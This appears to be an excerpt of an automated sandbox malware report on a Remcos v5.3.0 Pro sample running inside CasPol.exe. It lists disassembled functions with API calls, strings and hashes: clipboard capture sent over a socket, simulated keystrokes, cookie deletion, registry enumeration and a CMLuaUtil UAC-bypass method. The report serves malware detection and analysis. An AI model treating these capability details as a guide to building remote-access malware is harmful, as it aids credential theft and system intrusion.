                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SendInput.USER32 ref: 00418B08
                                                                                                            • SendInput.USER32(00000001,?,0000001C), ref: 00418B30
                                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
                                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
                                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
                                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
                                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
                                                                                                            • SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
                                                                                                              • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InputSend$Virtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 1167301434-0
                                                                                                            • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                            • Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
                                                                                                            • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                            • Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB
                                                                                                            Function 00415A45 Relevance: 12.0, APIs: 8, Instructions: 46clipboardCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • OpenClipboard.USER32 ref: 00415A46
                                                                                                            • EmptyClipboard.USER32 ref: 00415A54
                                                                                                            • CloseClipboard.USER32 ref: 00415A5A
                                                                                                            • OpenClipboard.USER32 ref: 00415A61
                                                                                                            • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                            • CloseClipboard.USER32 ref: 00415A89
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                            • String ID:
                                                                                                            • API String ID: 2172192267-0
                                                                                                            • Opcode ID: 6a9ec668e7fdea89666e78c86b70ee6c6b12921e874800debc66150193591dc0
                                                                                                            • Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
                                                                                                            • Opcode Fuzzy Hash: 6a9ec668e7fdea89666e78c86b70ee6c6b12921e874800debc66150193591dc0
                                                                                                            • Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
                                                                                                            Function 00447E3A Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00447EBC
                                                                                                            • _free.LIBCMT ref: 00447EE0
                                                                                                            • _free.LIBCMT ref: 00448067
                                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                                                                            • _free.LIBCMT ref: 00448233
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                            • String ID:
                                                                                                            • API String ID: 314583886-0
                                                                                                            • Opcode ID: 04a177aa394c08073a9100b76bd7aa64a881fee61158bcf3f639474d4cceeb7e
                                                                                                            • Instruction ID: d74e55ca02e924b9256a88f94e7be2aa31ce1fd8fbfcff02d88bcfbefc6cbd9d
                                                                                                            • Opcode Fuzzy Hash: 04a177aa394c08073a9100b76bd7aa64a881fee61158bcf3f639474d4cceeb7e
                                                                                                            • Instruction Fuzzy Hash: 32C12871904205ABFB24DF799C41AAE7BB8EF46314F2441AFE484A7351EB388E47C758
                                                                                                            Function 0044F806 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free
                                                                                                            • String ID:
                                                                                                            • API String ID: 269201875-0
                                                                                                            • Opcode ID: 7c9beb2791b6ce89b88df1f42b01a9acb1f91b5f19b960fb620ecff1e548522d
                                                                                                            • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
                                                                                                            • Opcode Fuzzy Hash: 7c9beb2791b6ce89b88df1f42b01a9acb1f91b5f19b960fb620ecff1e548522d
                                                                                                            • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                                                                                                            Function 00443F7B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                            • _free.LIBCMT ref: 00444086
                                                                                                            • _free.LIBCMT ref: 0044409D
                                                                                                            • _free.LIBCMT ref: 004440BC
                                                                                                            • _free.LIBCMT ref: 004440D7
                                                                                                            • _free.LIBCMT ref: 004440EE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$AllocateHeap
                                                                                                            • String ID: J7D
                                                                                                            • API String ID: 3033488037-1677391033
                                                                                                            • Opcode ID: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
                                                                                                            • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                                                                                                            • Opcode Fuzzy Hash: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
                                                                                                            • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                                                                                                            Function 0044A0C3 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A105
                                                                                                            • __fassign.LIBCMT ref: 0044A180
                                                                                                            • __fassign.LIBCMT ref: 0044A19B
                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1C1
                                                                                                            • WriteFile.KERNEL32(?,00000000,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                                                                                                            • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                            • String ID:
                                                                                                            • API String ID: 1324828854-0
                                                                                                            • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                            • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                                                                                                            • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                            • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                                                                                                            Function 004559CA Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free
                                                                                                            • String ID: HE$HE
                                                                                                            • API String ID: 269201875-1978648262
                                                                                                            • Opcode ID: be36c282a63d03c20bc32278ff653e2fb99f791dd32da19cc4c4d74979feac0c
                                                                                                            • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                                                                                                            • Opcode Fuzzy Hash: be36c282a63d03c20bc32278ff653e2fb99f791dd32da19cc4c4d74979feac0c
                                                                                                            • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                                                                                                            Function 00412C88 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                                                                              • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                              • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseEnumInfoOpenQuerysend
                                                                                                            • String ID: TUFTUF$>G$DG$DG
                                                                                                            • API String ID: 3114080316-344394840
                                                                                                            • Opcode ID: a7cbbf494201fdfd46b352284ff1bc29af0ab57b085014640ab1cd51c4bb0307
                                                                                                            • Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
                                                                                                            • Opcode Fuzzy Hash: a7cbbf494201fdfd46b352284ff1bc29af0ab57b085014640ab1cd51c4bb0307
                                                                                                            • Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                                                                            Function 00437A80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                            • String ID: csm
                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                            • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                            • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                                                                                                            • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                            • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                                                                                                            Function 0040B6EA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                              • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                              • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                            • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                                                            • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                            • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                            • API String ID: 1133728706-4073444585
                                                                                                            • Opcode ID: ed863c921e9cafa649e96df88b724608b92e8b32daa03b13c741907c5a10fac7
                                                                                                            • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                                                                                                            • Opcode Fuzzy Hash: ed863c921e9cafa649e96df88b724608b92e8b32daa03b13c741907c5a10fac7
                                                                                                            • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
                                                                                                            Function 00455903 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 02717eb42979939780aa55e78abd64da983f54570bcab5d4a33c232e0763f4b4
                                                                                                            • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                                                                                                            • Opcode Fuzzy Hash: 02717eb42979939780aa55e78abd64da983f54570bcab5d4a33c232e0763f4b4
                                                                                                            • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                                                                                                            Function 0040FBEF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                                                                            • int.LIBCPMT ref: 0040FC0F
                                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                            • String ID: P[G
                                                                                                            • API String ID: 2536120697-571123470
                                                                                                            • Opcode ID: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                                                            • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                                                                                                            • Opcode Fuzzy Hash: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                                                            • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                                                                                                            Function 0044FCDB Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                                                                                                            • _free.LIBCMT ref: 0044FD29
                                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                            • _free.LIBCMT ref: 0044FD34
                                                                                                            • _free.LIBCMT ref: 0044FD3F
                                                                                                            • _free.LIBCMT ref: 0044FD93
                                                                                                            • _free.LIBCMT ref: 0044FD9E
                                                                                                            • _free.LIBCMT ref: 0044FDA9
                                                                                                            • _free.LIBCMT ref: 0044FDB4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                            • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                                                                                                            • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                            • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                                                                                                            Function 00406815 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406835
                                                                                                              • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                                                              • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                            • CoUninitialize.OLE32 ref: 0040688E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InitializeObjectUninitialize_wcslen
                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                            • API String ID: 3851391207-2637227304
                                                                                                            • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                                            • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                                                                            • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                                            • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                                                                            Function 0040FED2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                                                                            • int.LIBCPMT ref: 0040FEF2
                                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                            • String ID: H]G
                                                                                                            • API String ID: 2536120697-1717957184
                                                                                                            • Opcode ID: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                                                            • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                                                                                                            • Opcode Fuzzy Hash: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                                                            • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                                                                                                            Function 0040B2A8 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                                                            • GetLastError.KERNEL32 ref: 0040B2EE
                                                                                                            Strings
                                                                                                            • [Chrome Cookies not found], xrefs: 0040B308
                                                                                                            • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                                                            • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                                                            • UserProfile, xrefs: 0040B2B4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: DeleteErrorFileLast
                                                                                                            • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                            • API String ID: 2018770650-304995407
                                                                                                            • Opcode ID: ec592ed9ccf4b9a5ae27431b7db5c03baafcaff9f2a5fd094053063a907b4898
                                                                                                            • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                                                                                                            • Opcode Fuzzy Hash: ec592ed9ccf4b9a5ae27431b7db5c03baafcaff9f2a5fd094053063a907b4898
                                                                                                            • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
                                                                                                            Function 0041BEB0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • AllocConsole.KERNEL32(00474358), ref: 0041BEB9
                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                                                                                                            • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Console$AllocOutputShowWindow
                                                                                                            • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                                                                            • API String ID: 2425139147-2527699604
                                                                                                            • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                                            • Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
                                                                                                            • Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                                            • Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
                                                                                                            Function 004064D0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$BG
                                                                                                            • API String ID: 0-3292752334
                                                                                                            • Opcode ID: b7a2e59ac2a9b4cfd69ae58ffa53ef09c4b6135ca76893af750d01e39a00b3fe
                                                                                                            • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                                                                            • Opcode Fuzzy Hash: b7a2e59ac2a9b4cfd69ae58ffa53ef09c4b6135ca76893af750d01e39a00b3fe
                                                                                                            • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                                                                            Function 004395FC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __allrem.LIBCMT ref: 00439789
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                                                                            • __allrem.LIBCMT ref: 004397BC
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                                                                            • __allrem.LIBCMT ref: 004397F1
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
